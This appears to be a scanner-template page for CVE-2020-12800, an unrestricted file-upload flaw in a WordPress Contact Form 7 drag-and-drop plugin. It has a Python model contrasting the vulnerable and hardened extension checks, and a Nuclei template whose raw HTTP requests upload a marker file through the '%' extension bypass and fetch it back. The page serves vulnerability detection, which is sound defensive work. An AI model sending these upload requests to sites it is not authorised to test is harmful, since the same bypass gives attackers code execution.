WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution
ID: CVE-2020-12800
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz
Description
WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
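To make the bypass concrete, here is an added Python model (not the plugin's or the template's own code) of the extension check this CVE defeats: the vulnerable flow validates the raw extension against the client-supplied supported_type list and only then sanitizes the stored name (dropping the trailing %, which is why the template uploads {{randstr}}.txt% and fetches {{randstr}}.txt), while the hardened flow sanitizes first and checks the resulting extension against a server-side allowlist. The sanitizer, the allowlist and the function names are assumptions made for this example.

```python
from typing import Optional

# Characters the stored name loses; modelled on WordPress sanitize_file_name(),
# which strips '%' among others (assumption: simplified for this example).
STRIPPED_CHARS = set('%?[]/\\=<>:;,\'"&$#*()|~`!{}+')

# Server-controlled allowlist that a hardened plugin would consult instead of
# the client-supplied supported_type field (constructed for this example).
SERVER_ALLOWLIST = {"jpg", "png", "pdf", "txt"}


def sanitize_file_name(name: str) -> str:
    """Remove characters that are not allowed in a stored filename."""
    return "".join(c for c in name if c not in STRIPPED_CHARS)


def extension_of(name: str) -> str:
    """Lower-cased extension, or '' when there is none."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def vulnerable_upload_check(filename: str, supported_type: str) -> Optional[str]:
    """Vulnerable order of operations: validate the *raw* extension against the
    *client-supplied* list, then sanitize. 'x.php%' with supported_type 'php%'
    passes the check and is stored as 'x.php'. Returns the stored name or None."""
    allowed = {t.strip().lower() for t in supported_type.split(",")}
    if extension_of(filename) not in allowed:
        return None
    return sanitize_file_name(filename)


def hardened_upload_check(filename: str, supported_type: str) -> Optional[str]:
    """Hardened order: sanitize first, then validate the extension that will
    actually be stored against a server-side allowlist. The client-supplied
    supported_type is kept in the signature for compatibility but never used
    as an authorization source."""
    stored = sanitize_file_name(filename)
    if extension_of(stored) not in SERVER_ALLOWLIST:
        return None
    return stored
```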
YAML Source
id: CVE-2020-12800

info:
  name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12800
    - https://github.com/amartinsec/CVE-2020-12800
    - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html
    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12800
    cwe-id: CWE-434
    epss-score: 0.97465
    epss-percentile: 0.99957
    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codedropz
    product: drag_and_drop_multiple_file_upload_-_contact_form_7
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601
        X-Requested-With: XMLHttpRequest

        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="supported_type"

        txt%
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="size_limit"

        5242880
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="action"

        dnd_codedropz_upload
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="type"

        click
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
        Content-Type: application/x-httpd-php

        CVE-2020-12800-{{randstr}}
        -----------------------------350278735926454076983690555601--
      - |
        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2020-12800-{{randstr}}"

      - type: status
        status:
          - 200
# digest: 490a00463044022019f6b054490f762f4cddaf48cfc5116d9b1acf70c01422d944a40e390b3b8b4d02203fd10d73fb7ea3044412f3feb5583049b7651e7833cd2ec557583c6081bf76c6:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template checks a target for this vulnerability with the Nuclei scanner: it uploads a harmless marker file through the plugin's upload action and then requests it back from the uploads directory. Run it against the target URL as shown.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12800.yaml"